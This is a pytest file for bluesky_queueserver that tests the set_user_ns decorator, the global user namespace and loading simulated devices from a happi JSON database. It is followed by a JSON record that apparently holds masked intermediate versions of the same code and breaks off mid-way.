assert "ipython" not in params
check_signature(nspace["f1"])
check_signature(nspace["f1a"])
check_signature(nspace["f2"])
check_signature(nspace["f2a"])
assert nspace["value_f3"] == 91
assert nspace["value_f4"] == 90
# Test function
global_user_namespace.set_user_namespace(user_ns=nspace, use_ipython=False)
global_user_namespace.user_ns["v_from_namespace"] = "value-sent-to-func"
assert nspace["v_from_namespace"] == "value-sent-to-func"
result_func = nspace["f1"](60)
assert nspace["func_was_called"] == "func_was_called"
assert result_func[0] == 60
assert result_func[1] == "value-sent-to-func"
assert result_func[2] is False
result_func = nspace["f1a"](65)
assert nspace["func_A_was_called"] == "func_was_called"
assert result_func[0] == 65
assert result_func[1] == "value-sent-to-func"
# Test generator
global_user_namespace.user_ns["v_from_namespace"] = "value-sent-to-gen"
result_func = list(nspace["f2"](110))[0]
assert nspace["gen_was_called"] == "gen_was_called"
assert result_func[0] == 110
assert result_func[1] == "value-sent-to-gen"
assert result_func[2] is False
result_func = list(nspace["f2a"](115))[0]
assert nspace["gen_A_was_called"] == "gen_was_called"
assert result_func[0] == 115
assert result_func[1] == "value-sent-to-gen"
def test_global_user_namespace():
"""
Basic test for ``global_user_namespace``.
"""
ns = {"ab": 1, "cd": 2}
global_user_namespace.set_user_namespace(user_ns=ns)
assert global_user_namespace.user_ns == ns
assert global_user_namespace.use_ipython is False
global_user_namespace.set_user_namespace(user_ns={}, use_ipython=True)
assert global_user_namespace.user_ns == {}
assert global_user_namespace.use_ipython is True
global_user_namespace.set_user_namespace(user_ns=ns, use_ipython=False)
assert global_user_namespace.user_ns == ns
assert global_user_namespace.use_ipython is False
_happi_json_db_1 = """
{
"det": {
"_id": "det",
"active": true,
"args": [],
"device_class": "ophyd.sim.DetWithCountTime",
"documentation": null,
"kwargs": {
"name": "{{name}}"
},
"name": "det",
"type": "OphydItem"
},
"motor": {
"_id": "motor",
"active": true,
"args": [],
"device_class": "ophyd.sim.SynAxisNoPosition",
"documentation": null,
"kwargs": {
"name": "{{name}}"
},
"name": "motor",
"type": "OphydItem"
},
"motor1": {
"_id": "motor1",
"active": true,
"args": [],
"device_class": "ophyd.sim.SynAxisNoHints",
"documentation": null,
"kwargs": {
"name": "{{name}}"
},
"name": "motor1",
"type": "OphydItem"
},
"tst_motor2": {
"_id": "tst_motor2",
"active": true,
"args": [],
"device_class": "ophyd.sim.SynAxisNoHints",
"documentation": null,
"kwargs": {
"name": "{{name}}"
},
"name": "tst_motor2",
"type": "OphydItem"
},
"motor3": {
"_id": "motor3",
"active": true,
"args": [],
"device_class": "ophyd.sim.SynAxis",
"documentation": null,
"kwargs": {
"name": "{{name}}"
},
"name": "motor3",
"type": "OphydItem"
},
"motor3_duplicate_error": {
"_id": "motor3",
"active": false,
"args": [],
"device_class": "ophyd.sim.SynAxis",
"documentation": null,
"kwargs": {
"name": "{{name}}"
},
"name": "motor3",
"type": "OphydItem"
}
}
"""
def _configure_happi(tmp_path, monkeypatch, json_devices):
path_json = os.path.join(tmp_path, "sim_devices.json")
path_ini = os.path.join(tmp_path, "happi.ini")
happi_ini_text = f"[DEFAULT]\nbackend=json\npath={path_json}"
with open(path_ini, "w") as f:
f.write(happi_ini_text)
with open(path_json, "w") as f:
f.write(json_devices)
monkeypatch.setenv("HAPPI_CFG", path_ini)
# fmt: off
@pytest.mark.parametrize("device_names, loaded_names, kw_args, success, errmsg", [
([], [], {}, True, ""), # No devices are loaded if the list of devices is empty
(("det", "motor"), ("det", "motor"), {}, True, ""),
(["det", "motor"], ("det", "motor"), {}, True, ""),
((("det", ""), ["motor", ""]), ("det", "motor"), {}, True, ""),
(("det", ["motor", ""]), ("det", "motor"), {}, True, ""),
(("det", ("motor", ""), ("tst_motor2", "motor2")), ("det", "motor", "motor2"), {}, True, ""),
# This is not typical use case, but the same device may be loaded multiple times
# with different names if needed.
((("motor1", "motor1_copy1"), ("motor1", "motor1_copy2")), ("motor1_copy1", "motor1_copy2"), {}, True, ""),
# Incorrect type of the device list
(10, ("det", "motor"), {}, False, "Parameter 'device_names' value must be a tuple or a list"),
("string", ("det", "motor"), {}, False, "Parameter 'device_names' value must be a tuple or a list"),
# Incorrecty type or form of a device list element
(("det", 10), ("det", "motor"), {}, False, "Parameter 'device_names': element .* must be str, tuple or list"),
((10, "motor"), ("det", "motor"), {}, False,
"Parameter 'device_names': element .* must be str, tuple or list"),
(("det", (10, "motor2")), ("det", "motor"), {}, False, "element .* is expected to be in the form"),
(("det", ("tst_motor2", 10)), ("det", "motor"), {}, False, "element .* is expected to be in the form"),
(("det", ("tst_motor2", "motor2", 10)), ("det", "motor"), {}, False,
"element .* is expected to be in the form"),
# No device found
(("det", "motor10"), ("det", "motor10"), {}, False, "No devices with name"),
# Multiple devices found (search for "motor3" yields multile devices, this is database issue)
(("det", "motor3"), ("det", "motor3"), {}, False, "Multiple devices with name"),
# Use additional search parameters. (Two entries for "motor3" differ in the value of `active` field.
# A single entry for `det` has `active==True`.)
(("det", "motor3"), ("det", "motor3"), {"active": True}, True, ""),
(("det", "motor3"), ("det", "motor3"), {"active": False}, False,
"No devices with name 'det' were found in Happi database."),
(("motor3",), ("motor3",), {"active": False}, True, ""),
# Verify that valid device names are accepted
(("det", ["motor", "motor3_new"]), ("det", "motor3_new"), {}, True, ""),
# Invalid new device name
(("det", ["motor", "Motor"]), ("det", "motor"), {}, False, "may consist of lowercase letters, numbers"),
(("det", ["motor", "moTor"]), ("det", "motor"), {}, False, "may consist of lowercase letters, numbers"),
(("det", ["motor", "_motor"]), ("det", "motor"), {}, False, "may consist of lowercase letters, numbers"),
(("det", ["motor", " motor"]), ("det", "motor"), {}, False, "may consist of lowercase letters, numbers"),
(("det", ["motor", "motor "]), ("det", "motor"), {}, False, "may consist of lowercase letters, numbers"),
(("det", ["motor", "motor new"]), ("det", "motor"), {}, False, "may consist of lowercase letters, numbers"),
(("det", ["motor", "motor_$new"]), ("det", "motor"), {}, False, "may consist of lowercase letters, numbers"),
(("det", ["motor", "2motor_$new"]), ("det", "motor"), {}, False, "may consist of lowercase letters, numbers"),
])
# fmt: on
def test_load_devices_from_happi_1(tmp_path, monkeypatch, device_names, loaded_names, kw_args, success, errmsg):
"""
Tests for ``load_devices_from_happi``.
"""
_configure_happi(tmp_path, monkeypatch, json_devices=_happi_json_db_1)
# Load as a dictionary
if success:
ns = {}
dlist = load_devices_from_happi(device_names, namespace=ns, **kw_args)
assert len(ns) == len(loaded_names), str(ns)
for d in loaded_names:
assert d in ns
assert set(dlist) == set(loaded_names)
else:
with pytest.raises(Exception, match=errmsg):
ns = {}
load_devices_from_happi(device_names, namespace=ns, **kw_args)
# Load in local namespace
def _test_loading(device_names, loaded_names):
if success:
load_devices_from_happi(device_names, namespace=locals(), **kw_args)
for d in loaded_names:
assert d in locals()
else:
with pytest.raises(Exception, match=errmsg):
load_devices_from_happi(device_names, namespace=locals(), **kw_args)
_test_loading(device_names=device_names, loaded_names=loaded_names)
def test_load_devices_from_happi_2_fail(tmp_path, monkeypatch):
"""
Function ``load_devices_from_happi``: parameter ``namespace`` is required and must be of type ``dict``.
"""
_configure_happi(tmp_path, monkeypatch, json_devices=_happi_json_db_1)
# Missing 'namespace' parameter
with pytest.raises(TypeError, match="missing 1 required keyword-only argument: 'namespace'"):
load_devices_from_happi(["det", "motor"])
# Incorrect type of 'namespace' parameter
with pytest.raises(TypeError, match="Parameter 'namespace' must be a dictionary"):
load_devices_from_happi(["det", "motor"], namespace=[1, 2, 3])
|
normal
|
{
"blob_id": "ad1ec5dd8fae290ab6cb73b17c5522e062261359",
"index": 6698,
"step-1": "<mask token>\n\n\ndef create_local_imports_files(tmp_path):\n path_dir = os.path.join(tmp_path, 'dir_local_imports')\n fln_func = os.path.join(path_dir, 'file_func.py')\n fln_gen = os.path.join(path_dir, 'file_gen.py')\n os.makedirs(path_dir, exist_ok=True)\n code1 = \"\"\"\nfrom bluesky_queueserver.manager.profile_tools import set_user_ns\n\n# Function that has the parameter 'ipython'\n@set_user_ns\ndef f1(some_value, user_ns, ipython):\n user_ns[\"func_was_called\"] = \"func_was_called\"\n return (some_value, user_ns[\"v_from_namespace\"], bool(ipython))\n\n# Function that has no parameter 'ipython'\n@set_user_ns\ndef f1a(some_value, user_ns):\n user_ns[\"func_A_was_called\"] = \"func_was_called\"\n return (some_value, user_ns[\"v_from_namespace\"])\n\n\"\"\"\n with open(fln_func, 'w') as f:\n f.writelines(code1)\n code2 = \"\"\"\nfrom bluesky_queueserver.manager.profile_tools import set_user_ns\n\n# Function that has the parameter 'ipython'\n@set_user_ns\ndef f2(some_value, user_ns, ipython):\n user_ns[\"gen_was_called\"] = \"gen_was_called\"\n yield (some_value, user_ns[\"v_from_namespace\"], bool(ipython))\n\n# Function that has no parameter 'ipython'\n@set_user_ns\ndef f2a(some_value, user_ns):\n user_ns[\"gen_A_was_called\"] = \"gen_was_called\"\n yield (some_value, user_ns[\"v_from_namespace\"])\n\n@set_user_ns\ndef f3(some_value, user_ns, ipython):\n user_ns[\"value_f3\"] = some_value\n\nf3(91)\n\n\"\"\"\n with open(fln_gen, 'w') as f:\n f.writelines(code2)\n\n\n<mask token>\n\n\ndef test_set_user_ns_1(tmp_path):\n \"\"\"\n Tests for ``set_user_ns`` decorator. The functionality of the decorator\n is fully tested (only without IPython):\n - using ``global_user_namespace`` to pass values in and out of the function\n defined in the imported module (emulation of ``get_ipython().user_ns``).\n - checking if the function is executed from IPython (only for the function\n defined in the imported module).\n \"\"\"\n pc_path = copy_default_profile_collection(tmp_path)\n create_local_imports_files(pc_path)\n patch_first_startup_file(pc_path, patch_code)\n nspace = load_profile_collection(pc_path)\n assert len(nspace) > 0, 'Failed to load the profile collection'\n assert 'f1' in nspace, 'Test for local imports failed'\n assert 'f2' in nspace, 'Test for local imports failed'\n assert inspect.isgeneratorfunction(nspace['f1']) is False\n assert inspect.isgeneratorfunction(nspace['f2']) is True\n\n def check_signature(func):\n params = inspect.signature(func).parameters\n assert 'user_ns' not in params\n assert 'ipython' not in params\n check_signature(nspace['f1'])\n check_signature(nspace['f1a'])\n check_signature(nspace['f2'])\n check_signature(nspace['f2a'])\n assert nspace['value_f3'] == 91\n assert nspace['value_f4'] == 90\n global_user_namespace.set_user_namespace(user_ns=nspace, use_ipython=False)\n global_user_namespace.user_ns['v_from_namespace'] = 'value-sent-to-func'\n assert nspace['v_from_namespace'] == 'value-sent-to-func'\n result_func = nspace['f1'](60)\n assert nspace['func_was_called'] == 'func_was_called'\n assert result_func[0] == 60\n assert result_func[1] == 'value-sent-to-func'\n assert result_func[2] is False\n result_func = nspace['f1a'](65)\n assert nspace['func_A_was_called'] == 'func_was_called'\n assert result_func[0] == 65\n assert result_func[1] == 'value-sent-to-func'\n global_user_namespace.user_ns['v_from_namespace'] = 'value-sent-to-gen'\n result_func = list(nspace['f2'](110))[0]\n assert nspace['gen_was_called'] == 'gen_was_called'\n assert result_func[0] == 110\n assert result_func[1] == 'value-sent-to-gen'\n assert result_func[2] is False\n result_func = list(nspace['f2a'](115))[0]\n assert nspace['gen_A_was_called'] == 'gen_was_called'\n assert result_func[0] == 115\n assert result_func[1] == 'value-sent-to-gen'\n\n\ndef test_global_user_namespace():\n \"\"\"\n Basic test for ``global_user_namespace``.\n \"\"\"\n ns = {'ab': 1, 'cd': 2}\n global_user_namespace.set_user_namespace(user_ns=ns)\n assert global_user_namespace.user_ns == ns\n assert global_user_namespace.use_ipython is False\n global_user_namespace.set_user_namespace(user_ns={}, use_ipython=True)\n assert global_user_namespace.user_ns == {}\n assert global_user_namespace.use_ipython is True\n global_user_namespace.set_user_namespace(user_ns=ns, use_ipython=False)\n assert global_user_namespace.user_ns == ns\n assert global_user_namespace.use_ipython is False\n\n\n<mask token>\n\n\[email protected]('device_names, loaded_names, kw_args, success, errmsg'\n , [([], [], {}, True, ''), (('det', 'motor'), ('det', 'motor'), {}, \n True, ''), (['det', 'motor'], ('det', 'motor'), {}, True, ''), ((('det',\n ''), ['motor', '']), ('det', 'motor'), {}, True, ''), (('det', ['motor',\n '']), ('det', 'motor'), {}, True, ''), (('det', ('motor', ''), (\n 'tst_motor2', 'motor2')), ('det', 'motor', 'motor2'), {}, True, ''), ((\n ('motor1', 'motor1_copy1'), ('motor1', 'motor1_copy2')), (\n 'motor1_copy1', 'motor1_copy2'), {}, True, ''), (10, ('det', 'motor'),\n {}, False, \"Parameter 'device_names' value must be a tuple or a list\"),\n ('string', ('det', 'motor'), {}, False,\n \"Parameter 'device_names' value must be a tuple or a list\"), (('det', \n 10), ('det', 'motor'), {}, False,\n \"Parameter 'device_names': element .* must be str, tuple or list\"), ((\n 10, 'motor'), ('det', 'motor'), {}, False,\n \"Parameter 'device_names': element .* must be str, tuple or list\"), ((\n 'det', (10, 'motor2')), ('det', 'motor'), {}, False,\n 'element .* is expected to be in the form'), (('det', ('tst_motor2', 10\n )), ('det', 'motor'), {}, False,\n 'element .* is expected to be in the form'), (('det', ('tst_motor2',\n 'motor2', 10)), ('det', 'motor'), {}, False,\n 'element .* is expected to be in the form'), (('det', 'motor10'), (\n 'det', 'motor10'), {}, False, 'No devices with name'), (('det',\n 'motor3'), ('det', 'motor3'), {}, False, 'Multiple devices with name'),\n (('det', 'motor3'), ('det', 'motor3'), {'active': True}, True, ''), ((\n 'det', 'motor3'), ('det', 'motor3'), {'active': False}, False,\n \"No devices with name 'det' were found in Happi database.\"), (('motor3'\n ,), ('motor3',), {'active': False}, True, ''), (('det', ['motor',\n 'motor3_new']), ('det', 'motor3_new'), {}, True, ''), (('det', ['motor',\n 'Motor']), ('det', 'motor'), {}, False,\n 'may consist of lowercase letters, numbers'), (('det', ['motor',\n 'moTor']), ('det', 'motor'), {}, False,\n 'may consist of lowercase letters, numbers'), (('det', ['motor',\n '_motor']), ('det', 'motor'), {}, False,\n 'may consist of lowercase letters, numbers'), (('det', ['motor',\n ' motor']), ('det', 'motor'), {}, False,\n 'may consist of lowercase letters, numbers'), (('det', ['motor',\n 'motor ']), ('det', 'motor'), {}, False,\n 'may consist of lowercase letters, numbers'), (('det', ['motor',\n 'motor new']), ('det', 'motor'), {}, False,\n 'may consist of lowercase letters, numbers'), (('det', ['motor',\n 'motor_$new']), ('det', 'motor'), {}, False,\n 'may consist of lowercase letters, numbers'), (('det', ['motor',\n '2motor_$new']), ('det', 'motor'), {}, False,\n 'may consist of lowercase letters, numbers')])\ndef test_load_devices_from_happi_1(tmp_path, monkeypatch, device_names,\n loaded_names, kw_args, success, errmsg):\n \"\"\"\n Tests for ``load_devices_from_happi``.\n \"\"\"\n _configure_happi(tmp_path, monkeypatch, json_devices=_happi_json_db_1)\n if success:\n ns = {}\n dlist = load_devices_from_happi(device_names, namespace=ns, **kw_args)\n assert len(ns) == len(loaded_names), str(ns)\n for d in loaded_names:\n assert d in ns\n assert set(dlist) == set(loaded_names)\n else:\n with pytest.raises(Exception, match=errmsg):\n ns = {}\n load_devices_from_happi(device_names, namespace=ns, **kw_args)\n\n def _test_loading(device_names, loaded_names):\n if success:\n load_devices_from_happi(device_names, namespace=locals(), **kw_args\n )\n for d in loaded_names:\n assert d in locals()\n else:\n with pytest.raises(Exception, match=errmsg):\n load_devices_from_happi(device_names, namespace=locals(),\n **kw_args)\n _test_loading(device_names=device_names, loaded_names=loaded_names)\n\n\ndef test_load_devices_from_happi_2_fail(tmp_path, monkeypatch):\n \"\"\"\n Function ``load_devices_from_happi``: parameter ``namespace`` is required and must be of type ``dict``.\n \"\"\"\n _configure_happi(tmp_path, monkeypatch, json_devices=_happi_json_db_1)\n with pytest.raises(TypeError, match=\n \"missing 1 required keyword-only argument: 'namespace'\"):\n load_devices_from_happi(['det', 'motor'])\n with pytest.raises(TypeError, match=\n \"Parameter 'namespace' must be a dictionary\"):\n load_devices_from_happi(['det', 'motor'], namespace=[1, 2, 3])\n",
"step-2": "<mask token>\n\n\ndef create_local_imports_files(tmp_path):\n path_dir = os.path.join(tmp_path, 'dir_local_imports')\n fln_func = os.path.join(path_dir, 'file_func.py')\n fln_gen = os.path.join(path_dir, 'file_gen.py')\n os.makedirs(path_dir, exist_ok=True)\n code1 = \"\"\"\nfrom bluesky_queueserver.manager.profile_tools import set_user_ns\n\n# Function that has the parameter 'ipython'\n@set_user_ns\ndef f1(some_value, user_ns, ipython):\n user_ns[\"func_was_called\"] = \"func_was_called\"\n return (some_value, user_ns[\"v_from_namespace\"], bool(ipython))\n\n# Function that has no parameter 'ipython'\n@set_user_ns\ndef f1a(some_value, user_ns):\n user_ns[\"func_A_was_called\"] = \"func_was_called\"\n return (some_value, user_ns[\"v_from_namespace\"])\n\n\"\"\"\n with open(fln_func, 'w') as f:\n f.writelines(code1)\n code2 = \"\"\"\nfrom bluesky_queueserver.manager.profile_tools import set_user_ns\n\n# Function that has the parameter 'ipython'\n@set_user_ns\ndef f2(some_value, user_ns, ipython):\n user_ns[\"gen_was_called\"] = \"gen_was_called\"\n yield (some_value, user_ns[\"v_from_namespace\"], bool(ipython))\n\n# Function that has no parameter 'ipython'\n@set_user_ns\ndef f2a(some_value, user_ns):\n user_ns[\"gen_A_was_called\"] = \"gen_was_called\"\n yield (some_value, user_ns[\"v_from_namespace\"])\n\n@set_user_ns\ndef f3(some_value, user_ns, ipython):\n user_ns[\"value_f3\"] = some_value\n\nf3(91)\n\n\"\"\"\n with open(fln_gen, 'w') as f:\n f.writelines(code2)\n\n\n<mask token>\n\n\ndef test_set_user_ns_1(tmp_path):\n \"\"\"\n Tests for ``set_user_ns`` decorator. The functionality of the decorator\n is fully tested (only without IPython):\n - using ``global_user_namespace`` to pass values in and out of the function\n defined in the imported module (emulation of ``get_ipython().user_ns``).\n - checking if the function is executed from IPython (only for the function\n defined in the imported module).\n \"\"\"\n pc_path = copy_default_profile_collection(tmp_path)\n create_local_imports_files(pc_path)\n patch_first_startup_file(pc_path, patch_code)\n nspace = load_profile_collection(pc_path)\n assert len(nspace) > 0, 'Failed to load the profile collection'\n assert 'f1' in nspace, 'Test for local imports failed'\n assert 'f2' in nspace, 'Test for local imports failed'\n assert inspect.isgeneratorfunction(nspace['f1']) is False\n assert inspect.isgeneratorfunction(nspace['f2']) is True\n\n def check_signature(func):\n params = inspect.signature(func).parameters\n assert 'user_ns' not in params\n assert 'ipython' not in params\n check_signature(nspace['f1'])\n check_signature(nspace['f1a'])\n check_signature(nspace['f2'])\n check_signature(nspace['f2a'])\n assert nspace['value_f3'] == 91\n assert nspace['value_f4'] == 90\n global_user_namespace.set_user_namespace(user_ns=nspace, use_ipython=False)\n global_user_namespace.user_ns['v_from_namespace'] = 'value-sent-to-func'\n assert nspace['v_from_namespace'] == 'value-sent-to-func'\n result_func = nspace['f1'](60)\n assert nspace['func_was_called'] == 'func_was_called'\n assert result_func[0] == 60\n assert result_func[1] == 'value-sent-to-func'\n assert result_func[2] is False\n result_func = nspace['f1a'](65)\n assert nspace['func_A_was_called'] == 'func_was_called'\n assert result_func[0] == 65\n assert result_func[1] == 'value-sent-to-func'\n global_user_namespace.user_ns['v_from_namespace'] = 'value-sent-to-gen'\n result_func = list(nspace['f2'](110))[0]\n assert nspace['gen_was_called'] == 'gen_was_called'\n assert result_func[0] == 110\n assert result_func[1] == 'value-sent-to-gen'\n assert result_func[2] is False\n result_func = list(nspace['f2a'](115))[0]\n assert nspace['gen_A_was_called'] == 'gen_was_called'\n assert result_func[0] == 115\n assert result_func[1] == 'value-sent-to-gen'\n\n\ndef test_global_user_namespace():\n \"\"\"\n Basic test for ``global_user_namespace``.\n \"\"\"\n ns = {'ab': 1, 'cd': 2}\n global_user_namespace.set_user_namespace(user_ns=ns)\n assert global_user_namespace.user_ns == ns\n assert global_user_namespace.use_ipython is False\n global_user_namespace.set_user_namespace(user_ns={}, use_ipython=True)\n assert global_user_namespace.user_ns == {}\n assert global_user_namespace.use_ipython is True\n global_user_namespace.set_user_namespace(user_ns=ns, use_ipython=False)\n assert global_user_namespace.user_ns == ns\n assert global_user_namespace.use_ipython is False\n\n\n<mask token>\n\n\ndef _configure_happi(tmp_path, monkeypatch, json_devices):\n path_json = os.path.join(tmp_path, 'sim_devices.json')\n path_ini = os.path.join(tmp_path, 'happi.ini')\n happi_ini_text = f'[DEFAULT]\\nbackend=json\\npath={path_json}'\n with open(path_ini, 'w') as f:\n f.write(happi_ini_text)\n with open(path_json, 'w') as f:\n f.write(json_devices)\n monkeypatch.setenv('HAPPI_CFG', path_ini)\n\n\[email protected]('device_names, loaded_names, kw_args, success, errmsg'\n , [([], [], {}, True, ''), (('det', 'motor'), ('det', 'motor'), {}, \n True, ''), (['det', 'motor'], ('det', 'motor'), {}, True, ''), ((('det',\n ''), ['motor', '']), ('det', 'motor'), {}, True, ''), (('det', ['motor',\n '']), ('det', 'motor'), {}, True, ''), (('det', ('motor', ''), (\n 'tst_motor2', 'motor2')), ('det', 'motor', 'motor2'), {}, True, ''), ((\n ('motor1', 'motor1_copy1'), ('motor1', 'motor1_copy2')), (\n 'motor1_copy1', 'motor1_copy2'), {}, True, ''), (10, ('det', 'motor'),\n {}, False, \"Parameter 'device_names' value must be a tuple or a list\"),\n ('string', ('det', 'motor'), {}, False,\n \"Parameter 'device_names' value must be a tuple or a list\"), (('det', \n 10), ('det', 'motor'), {}, False,\n \"Parameter 'device_names': element .* must be str, tuple or list\"), ((\n 10, 'motor'), ('det', 'motor'), {}, False,\n \"Parameter 'device_names': element .* must be str, tuple or list\"), ((\n 'det', (10, 'motor2')), ('det', 'motor'), {}, False,\n 'element .* is expected to be in the form'), (('det', ('tst_motor2', 10\n )), ('det', 'motor'), {}, False,\n 'element .* is expected to be in the form'), (('det', ('tst_motor2',\n 'motor2', 10)), ('det', 'motor'), {}, False,\n 'element .* is expected to be in the form'), (('det', 'motor10'), (\n 'det', 'motor10'), {}, False, 'No devices with name'), (('det',\n 'motor3'), ('det', 'motor3'), {}, False, 'Multiple devices with name'),\n (('det', 'motor3'), ('det', 'motor3'), {'active': True}, True, ''), ((\n 'det', 'motor3'), ('det', 'motor3'), {'active': False}, False,\n \"No devices with name 'det' were found in Happi database.\"), (('motor3'\n ,), ('motor3',), {'active': False}, True, ''), (('det', ['motor',\n 'motor3_new']), ('det', 'motor3_new'), {}, True, ''), (('det', ['motor',\n 'Motor']), ('det', 'motor'), {}, False,\n 'may consist of lowercase letters, numbers'), (('det', ['motor',\n 'moTor']), ('det', 'motor'), {}, False,\n 'may consist of lowercase letters, numbers'), (('det', ['motor',\n '_motor']), ('det', 'motor'), {}, False,\n 'may consist of lowercase letters, numbers'), (('det', ['motor',\n ' motor']), ('det', 'motor'), {}, False,\n 'may consist of lowercase letters, numbers'), (('det', ['motor',\n 'motor ']), ('det', 'motor'), {}, False,\n 'may consist of lowercase letters, numbers'), (('det', ['motor',\n 'motor new']), ('det', 'motor'), {}, False,\n 'may consist of lowercase letters, numbers'), (('det', ['motor',\n 'motor_$new']), ('det', 'motor'), {}, False,\n 'may consist of lowercase letters, numbers'), (('det', ['motor',\n '2motor_$new']), ('det', 'motor'), {}, False,\n 'may consist of lowercase letters, numbers')])\ndef test_load_devices_from_happi_1(tmp_path, monkeypatch, device_names,\n loaded_names, kw_args, success, errmsg):\n \"\"\"\n Tests for ``load_devices_from_happi``.\n \"\"\"\n _configure_happi(tmp_path, monkeypatch, json_devices=_happi_json_db_1)\n if success:\n ns = {}\n dlist = load_devices_from_happi(device_names, namespace=ns, **kw_args)\n assert len(ns) == len(loaded_names), str(ns)\n for d in loaded_names:\n assert d in ns\n assert set(dlist) == set(loaded_names)\n else:\n with pytest.raises(Exception, match=errmsg):\n ns = {}\n load_devices_from_happi(device_names, namespace=ns, **kw_args)\n\n def _test_loading(device_names, loaded_names):\n if success:\n load_devices_from_happi(device_names, namespace=locals(), **kw_args\n )\n for d in loaded_names:\n assert d in locals()\n else:\n with pytest.raises(Exception, match=errmsg):\n load_devices_from_happi(device_names, namespace=locals(),\n **kw_args)\n _test_loading(device_names=device_names, loaded_names=loaded_names)\n\n\ndef test_load_devices_from_happi_2_fail(tmp_path, monkeypatch):\n \"\"\"\n Function ``load_devices_from_happi``: parameter ``namespace`` is required and must be of type ``dict``.\n \"\"\"\n _configure_happi(tmp_path, monkeypatch, json_devices=_happi_json_db_1)\n with pytest.raises(TypeError, match=\n \"missing 1 required keyword-only argument: 'namespace'\"):\n load_devices_from_happi(['det', 'motor'])\n with pytest.raises(TypeError, match=\n \"Parameter 'namespace' must be a dictionary\"):\n load_devices_from_happi(['det', 'motor'], namespace=[1, 2, 3])\n",
"step-3": "<mask token>\n\n\ndef create_local_imports_files(tmp_path):\n path_dir = os.path.join(tmp_path, 'dir_local_imports')\n fln_func = os.path.join(path_dir, 'file_func.py')\n fln_gen = os.path.join(path_dir, 'file_gen.py')\n os.makedirs(path_dir, exist_ok=True)\n code1 = \"\"\"\nfrom bluesky_queueserver.manager.profile_tools import set_user_ns\n\n# Function that has the parameter 'ipython'\n@set_user_ns\ndef f1(some_value, user_ns, ipython):\n user_ns[\"func_was_called\"] = \"func_was_called\"\n return (some_value, user_ns[\"v_from_namespace\"], bool(ipython))\n\n# Function that has no parameter 'ipython'\n@set_user_ns\ndef f1a(some_value, user_ns):\n user_ns[\"func_A_was_called\"] = \"func_was_called\"\n return (some_value, user_ns[\"v_from_namespace\"])\n\n\"\"\"\n with open(fln_func, 'w') as f:\n f.writelines(code1)\n code2 = \"\"\"\nfrom bluesky_queueserver.manager.profile_tools import set_user_ns\n\n# Function that has the parameter 'ipython'\n@set_user_ns\ndef f2(some_value, user_ns, ipython):\n user_ns[\"gen_was_called\"] = \"gen_was_called\"\n yield (some_value, user_ns[\"v_from_namespace\"], bool(ipython))\n\n# Function that has no parameter 'ipython'\n@set_user_ns\ndef f2a(some_value, user_ns):\n user_ns[\"gen_A_was_called\"] = \"gen_was_called\"\n yield (some_value, user_ns[\"v_from_namespace\"])\n\n@set_user_ns\ndef f3(some_value, user_ns, ipython):\n user_ns[\"value_f3\"] = some_value\n\nf3(91)\n\n\"\"\"\n with open(fln_gen, 'w') as f:\n f.writelines(code2)\n\n\npatch_code = \"\"\"\nfrom dir_local_imports.file_func import f1, f1a\nfrom dir_local_imports.file_gen import f2, f2a\n\nfrom bluesky_queueserver.manager.profile_tools import set_user_ns\n\n@set_user_ns\ndef f4(some_value, user_ns, ipython):\n user_ns[\"value_f4\"] = some_value\n\nf4(90)\n\n\"\"\"\n\n\ndef test_set_user_ns_1(tmp_path):\n \"\"\"\n Tests for ``set_user_ns`` decorator. The functionality of the decorator\n is fully tested (only without IPython):\n - using ``global_user_namespace`` to pass values in and out of the function\n defined in the imported module (emulation of ``get_ipython().user_ns``).\n - checking if the function is executed from IPython (only for the function\n defined in the imported module).\n \"\"\"\n pc_path = copy_default_profile_collection(tmp_path)\n create_local_imports_files(pc_path)\n patch_first_startup_file(pc_path, patch_code)\n nspace = load_profile_collection(pc_path)\n assert len(nspace) > 0, 'Failed to load the profile collection'\n assert 'f1' in nspace, 'Test for local imports failed'\n assert 'f2' in nspace, 'Test for local imports failed'\n assert inspect.isgeneratorfunction(nspace['f1']) is False\n assert inspect.isgeneratorfunction(nspace['f2']) is True\n\n def check_signature(func):\n params = inspect.signature(func).parameters\n assert 'user_ns' not in params\n assert 'ipython' not in params\n check_signature(nspace['f1'])\n check_signature(nspace['f1a'])\n check_signature(nspace['f2'])\n check_signature(nspace['f2a'])\n assert nspace['value_f3'] == 91\n assert nspace['value_f4'] == 90\n global_user_namespace.set_user_namespace(user_ns=nspace, use_ipython=False)\n global_user_namespace.user_ns['v_from_namespace'] = 'value-sent-to-func'\n assert nspace['v_from_namespace'] == 'value-sent-to-func'\n result_func = nspace['f1'](60)\n assert nspace['func_was_called'] == 'func_was_called'\n assert result_func[0] == 60\n assert result_func[1] == 'value-sent-to-func'\n assert result_func[2] is False\n result_func = nspace['f1a'](65)\n assert nspace['func_A_was_called'] == 'func_was_called'\n assert result_func[0] == 65\n assert result_func[1] == 'value-sent-to-func'\n global_user_namespace.user_ns['v_from_namespace'] = 'value-sent-to-gen'\n result_func = list(nspace['f2'](110))[0]\n assert nspace['gen_was_called'] == 'gen_was_called'\n assert result_func[0] == 110\n assert result_func[1] == 'value-sent-to-gen'\n assert result_func[2] is False\n result_func = list(nspace['f2a'](115))[0]\n assert nspace['gen_A_was_called'] == 'gen_was_called'\n assert result_func[0] == 115\n assert result_func[1] == 'value-sent-to-gen'\n\n\ndef test_global_user_namespace():\n \"\"\"\n Basic test for ``global_user_namespace``.\n \"\"\"\n ns = {'ab': 1, 'cd': 2}\n global_user_namespace.set_user_namespace(user_ns=ns)\n assert global_user_namespace.user_ns == ns\n assert global_user_namespace.use_ipython is False\n global_user_namespace.set_user_namespace(user_ns={}, use_ipython=True)\n assert global_user_namespace.user_ns == {}\n assert global_user_namespace.use_ipython is True\n global_user_namespace.set_user_namespace(user_ns=ns, use_ipython=False)\n assert global_user_namespace.user_ns == ns\n assert global_user_namespace.use_ipython is False\n\n\n_happi_json_db_1 = \"\"\"\n{\n \"det\": {\n \"_id\": \"det\",\n \"active\": true,\n \"args\": [],\n \"device_class\": \"ophyd.sim.DetWithCountTime\",\n \"documentation\": null,\n \"kwargs\": {\n \"name\": \"{{name}}\"\n },\n \"name\": \"det\",\n \"type\": \"OphydItem\"\n },\n \"motor\": {\n \"_id\": \"motor\",\n \"active\": true,\n \"args\": [],\n \"device_class\": \"ophyd.sim.SynAxisNoPosition\",\n \"documentation\": null,\n \"kwargs\": {\n \"name\": \"{{name}}\"\n },\n \"name\": \"motor\",\n \"type\": \"OphydItem\"\n },\n \"motor1\": {\n \"_id\": \"motor1\",\n \"active\": true,\n \"args\": [],\n \"device_class\": \"ophyd.sim.SynAxisNoHints\",\n \"documentation\": null,\n \"kwargs\": {\n 